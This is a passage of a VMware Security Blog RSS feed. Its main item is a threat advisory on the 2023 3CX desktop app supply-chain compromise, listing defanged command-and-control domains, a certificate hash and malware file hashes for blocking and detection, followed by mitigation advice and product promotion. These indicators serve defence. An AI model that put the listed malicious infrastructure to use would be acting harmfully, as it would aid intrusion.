data-contrast="auto">Improved access control:</span></b><span
data-contrast="auto"> User authentication visibility can also help organizations
improve access control by identifying users who have excessive or inappropriate
access privileges. This information can be used to adjust access policies and
prevent potential security breaches.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ul> <p><span data-contrast="auto">As a security practitioner and as someone
who has built security products for over eight years, my top priority is to
ensure our customers, partners, and the organizations they defend are protected
against modern threats. The inclusion of identity intelligence in Carbon Black
Cloud is another way we’re helping empower security professionals to keep their
organizations safe. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">We will continue to evolve the capability based on
feedback from YOU. To learn more, </span><a
href="https://www.vmware.com/resources/security/demo.html"><span
data-contrast="none">schedule a demo</span></a><span data-contrast="auto">, join
the Customer Advisory Board, and if you’re at the <a
href="https://engage.vmware.com/rsa2023" target="_blank" rel="noopener">RSA
Conference</a> – stop by our booth! </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Happy Hunting. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p><p>The
post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html">XDR:
Identity Matters – Who You Know is As Important as What You Know</a> appeared
first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware
Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>Investigating 3CX Desktop Application Attacks: What You Need to
Know</title>
<link>https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html?utm_source=rss&utm_medium=rss&utm_campaign=investigating-3cx-desktop-application-attacks-what-you-need-to-know</link>
<dc:creator>
<![CDATA[ Threat Analysis Unit ]]>
...
</dc:creator>
<pubDate>Fri, 31 Mar 2023 16:59:31 +0000</pubDate>
<category>
<![CDATA[ Threat Analysis Unit ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83435</guid>
<description>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>This is a developing
situation and this blog post will be updated as needed. Reports of malicious
code associated with the 3CX desktop application – part of the 3CX VoIP (Voice
over Internet Protocol) platform – began on March 22, 2023. On March 30, 2023,
3CX confirmed the compromise, noting the affected 3CX desktop app … <a
href="https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html">Investigating
3CX Desktop Application Attacks: What You Need to Know</a> appeared first on <a
rel="nofollow" href="https://blogs.vmware.com/security">VMware Security
Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><i><span
data-contrast="auto">This is a developing situation and this blog post will be
updated as needed.</span></i><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="none">Reports of malicious code associated with the 3CX
desktop application – part of the 3CX VoIP (Voice over Internet Protocol)
platform – began on March 22, 2023. On March 30, 2023, 3CX </span><a
href="https://www.3cx.com/blog/news/desktopapp-security-alert/"><span
data-contrast="none">confirmed</span></a><span data-contrast="none"> the
compromise, noting the affected 3CX desktop app versions were 18.12.407 and
18.12.416 for Windows and 18. 11.1213, 18.12.402, 18.12.407 and 18.12.416
versions for Mac. NIST National Vulnerability Database has assigned </span><a
href="https://nvd.nist.gov/vuln/detail/CVE-2023-29059"><span
data-contrast="none">CVE-2023-29059</span></a><span data-contrast="none"> to
track this issue.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="none">Reports indicate that one of the bundled libraries
included with the 3CX Windows and Mac desktop clients had been altered to
contact command and control infrastructure, including a GitHub repository, to
deliver second-stage malware. According to 3CX, the malicious domains and the
GitHub repository have since been taken down. </span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><b><span data-contrast="auto">What is the potential impact?</span></b><span
data-contrast="auto"> </span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="auto">Software supply chain attacks, as seen with the
SolarWinds attack in December 2020, can lead to security teams discovering that
their environment has been breached months prior in what is disguised as a
standard software update. This highlights the challenges associated with
software validation as part of supply chains. The impact of such an attack can
be devastating, causing long-term damage to the business, its reputation, and
its customers</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="auto">In the case of this 3CXDesktopApp attack, there is
not yet enough information on how the compromised code ended up being included
with 3CX digitally signed installers. 3CX </span><a
href="https://www.3cx.com/blog/news/desktopapp-security-alert-updates/"><span
data-contrast="none">has hired</span></a><span data-contrast="auto"> Mandiant to
assist with forensic activities. </span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><b><span data-contrast="auto">Observations by VMware Threat Analysis
Unit</span></b><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><i><span data-contrast="auto">Note: This is a developing situation and threat
analysis will be updated as needed.</span></i><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="auto">VMware Contexa detected the first connections to
the C2 domains included in the ICO files as early as 2023-03-06
(akamaitechcloudservices[.]com) and 2023-03-07 (pbxphonenetwork[.]com,
sbmsa[.]wiki, azureonlinestorage[.]com, officeaddons[.]com, pbxsources[.]com,
officestoragebox[.]com). See </span><span data-contrast="auto">Figure
1</span><span data-contrast="auto"> for the whole timeline. </span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span
data-ccp-props="{"134245418":true,"201341983":0,"335559739":0,"335559740":240}"><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM.png"><img
decoding="async" loading="lazy" class="alignnone size-large wp-image-83437"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-1024x607.png"
alt="" width="1024" height="607"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-1024x607.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-300x178.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-768x455.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-1536x911.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-600x356.png
600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM.png
1646w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></span></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">1</span></i><i><span data-contrast="none">: Connections to
C2 domains as detected by VMware Contexa.</span></i><span
data-ccp-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p>
<p><span data-contrast="auto">TLS connections to visualstudiofactory[.]com
taking place on 2023-03-24 and later were established to a server with a
certificate with the following hash
‘cda34a2b46a2269dc5934967175656a81bd3667a21855273dc2c777f8bd2d4c9’, valid from
2022-11-17, expiring on 2023-11-17, and issued by “C=GB, ST=Greater Manchester,
L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server
CA”. The recorded JA3S is 61be9ce3d068c08ff99a857f62352f9d, although note that
it is only useful when looking for TLS connections established by the
compromised 3CX desktop app.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span><span
data-contrast="auto">A </span><a
href="https://search.censys.io/certificates-legacy?q=parsed.fingerprint_sha256%3A+cda34a2b46a2269dc5934967175656a81bd3667a21855273dc2c777f8bd2d4c9&"><span
data-contrast="none">search on Censys</span></a><span data-contrast="auto"> can
also reveal that the host had been online since 2022-11-19; our telemetry,
however, does not show any activity related to this C2 domain prior to March
2023.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="none">Current hashes identified to be banned are the
following:</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="auto">Compromised parents/Installers</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span
data-contrast="auto">59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span
data-contrast="auto">aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><span
data-contrast="auto">7c55c3dfa373b6b342390938029cb76ef31f609d9a07780772c6010a4297e321</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><span
data-contrast="auto">e32cc0103827e8eef5881bd6fcae30ccc6bf6d68e8378c007a8fac2d8edbc071</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><span
data-contrast="auto">B5e318240401010e4453e146e3e67464dd625cfef9cd51c5015d68550ee8cc09</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ul> <p><span data-contrast="auto">Zip file</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><span
data-contrast="auto">5c54932fdbb077d73c58ac41a1ad3f6ea5576b3e1f719c8b714b637c9ceb361b</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><span
data-contrast="auto">b57d7e6c47516aeb1fd8384a9bc002f8c637b7d42b8f008a0c9e872914344dad</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ul> <p><span data-contrast="auto">ffmpeg.dll </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="8" data-aria-level="1"><span
data-contrast="auto">7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><span
data-contrast="auto">c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><span
data-contrast="auto">253f3a53796f1b0fbe64f7b05ae1d66bc2b0773588d00c3d2bf08572a497fa59</span>
<span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ul> <p><span data-contrast="auto">d3dcompiler_47.dll</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="11" data-aria-level="1"><span
data-contrast="auto">11be1803e2e307b647a8a7e02d128335c448ff741bf06bf52b332e0bbf423b03</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ul> <p><span data-contrast="auto">Secondary stage Payloads</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="12" data-aria-level="1"><span
data-contrast="auto">851c2c99ebafd4e5e9e140cfe3f2d03533846ca16f8151ae8ee0e83c692884b7 </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><span
data-contrast="auto">6a0f637546684c90809cf264c22a861c9a07b1ca3b2ef6a359a14d612e392c1a </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="14" data-aria-level="1"><span
data-contrast="auto">aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="15" data-aria-level="1"><span
data-contrast="auto">F5fdefaa5321e2cea02ef8b479de8ec3c5505e956ea1484c84a7abb17231fe24</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="16" data-aria-level="1"><span
data-contrast="auto">8ab3a5eaaf8c296080fadf56b265194681d7da5da7c02562953a4cb60e147423</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ul> <p aria-level="5"><b><span data-contrast="none">MacOS
Samples</span></b><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":40,"335559739":0,"335559740":259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="17" data-aria-level="1"><span
data-contrast="none">5407cda7d3a75e7b1e030b1f33337a56f293578ffa8b3ae19c671051ed314290</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="18" data-aria-level="1"><span
data-contrast="none">fee4f9dabc094df24d83ec1a8c4e4ff573e5d9973caa676f58086c99561382d7</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="19" data-aria-level="1"><span
data-contrast="none">e6bbc33815b9f20b0cf832d7401dd893fbc467c800728b5891336706da0dbcec</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="20" data-aria-level="1"><span
data-contrast="none">a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="21" data-aria-level="1"><span
data-contrast="none">b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="22" data-aria-level="1"><span
data-contrast="none">fd15a9619987925827ede24efa8990c3680c9c0b4a76eb1c43031de39c1b7ae1</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="23" data-aria-level="1"><span
data-contrast="none">9a47c9a3f7cf26ddc1fdb90dc48d30d69448e6d8ab64cc57dcb285c6b9d846c3</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="24" data-aria-level="1"><span
data-contrast="none">92005051ae314d61074ed94a52e76b1c3e21e7f0e8c1d1fdd497a006ce45fa61</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="25" data-aria-level="1"><span
data-contrast="none">c649e7c1897bfd30aad85c6b6736fcb2d002a7eaf64186eea00c1a44d6220803</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="26" data-aria-level="1"><span
data-contrast="none">fdad2f34e466782e4b272d3f8505c49c3bb6269c8d5fd8846f0cc399f9744cba</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="27" data-aria-level="1"><span
data-contrast="none">87c5d0c93b80acf61d24e7aaf0faae231ab507ca45483ad3d441b5d1acebc43c</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ul> <p><b><span data-contrast="auto">How can you protect your organization?
</span></b><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="none">3CX has </span><a
href="https://www.3cx.com/blog/news/desktopapp-security-alert-updates/"><span
data-contrast="none">provided mitigation guidance</span></a><span
data-contrast="none">, which includes a recommendation to uninstall the 3CX
desktop app. As of this writing, an updated desktop app was being prepared by
3CX. </span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="none">One of the biggest challenges with supply chain
attacks is that they are challenging to detect. Because the attack occurs
through a third-party vendor, the business may not even be aware that an attack
has taken place until it is too late. Organizations can minimize overall risk of
a supply chain attack by following security best practices. These
include:</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span
data-contrast="none">Developing a robust security strategy that encompasses the
entire supply chain. This means conducting thorough security checks on all
vendors, ensuring that they have appropriate security measures in place, and
regularly monitoring their systems for any potential threats.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span
data-contrast="none">Implementing endpoint and network security solutions that
can detect and respond to threats in real-time, as well as advanced threat
detection solutions that can identify potential anomalous threats as they
occur.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><span
data-contrast="none">Ensuring a solid incident response plan is in place in case
of a supply chain attack. This includes identifying the key stakeholders who
need to be notified, as well as having a clear process in place for containing
and mitigating the attack.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"><br
/> </span></li> </ul> <p><span data-contrast="none">By taking these steps,
businesses can reduce the risk of a supply chain attack and ensure the safety
and security of their operations and customers.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><b><span data-contrast="auto">How can VMware security products
help?</span></b><span data-contrast="auto"> </span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<ul> <li data-leveltext="-" data-font="Calibri" data-listid="1"
data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><span
data-contrast="auto">The hashes listed in this blog post have a known malware
reputation and should be blocked automatically by </span><b><span
data-contrast="auto">Carbon Black Cloud</span></b><span
data-contrast="auto">.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li>
<li data-leveltext="-" data-font="Calibri" data-listid="1"
data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><b><span
data-contrast="auto">Carbon Black EDR</span></b><span data-contrast="auto">
customers can search for netconn traffic to the domains listed in this blog
post.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li>
<li data-leveltext="-" data-font="Calibri" data-listid="1"
data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><b><span
data-contrast="auto">Carbon Black App Control</span></b><span
data-contrast="auto"> customers can ban the hashes listed in this blog
post.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li>
<li data-leveltext="-" data-font="Calibri" data-listid="1"
data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><span
data-contrast="auto">Carbon Black customers can also find additional product
related details and instructions by logging on to the user community and
accessing this link: <a
href="https://community.carbonblack.com/t5/Threat-Research-Docs/3CX-Compromise-a-k-a-Smooth-Operator/ta-p/117836"
target="_blank" rel="noopener">HERE</a></span></li> <li data-leveltext="-"
data-font="Calibri" data-listid="1"
data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><span
data-contrast="auto">For </span><b><span data-contrast="auto">NSX Advanced
Threat Prevention</span></b><span data-contrast="auto"> (ATP), all published
indicators are currently detected as malicious. Where guest virtual machines are
protected by the Distributed Malware Prevention Service leveraging Guest
Introspection, all malicious DLL files associated with this threat can be
mitigated with a ‘detect and prevent’ malware prevention profile
(</span><span data-contrast="auto">Figure 2</span><span data-contrast="auto">
shows how </span><b><span data-contrast="auto">NSX ATP </span></b><span
data-contrast="auto">detect the malicious DLLs through Guest Introspection).
</span><b><span data-contrast="auto">NSX ATP</span></b><span
data-contrast="auto"> has also anomaly-based detectors specifically tailored to
identify anomalous beaconing; the malicious domains associated with
3CXDesktopApp are now part of the network reputation feed provided by
</span><b><span data-contrast="auto">NSX ATP</span></b><span
data-contrast="auto">.</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li>
</ul> <p><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"><a
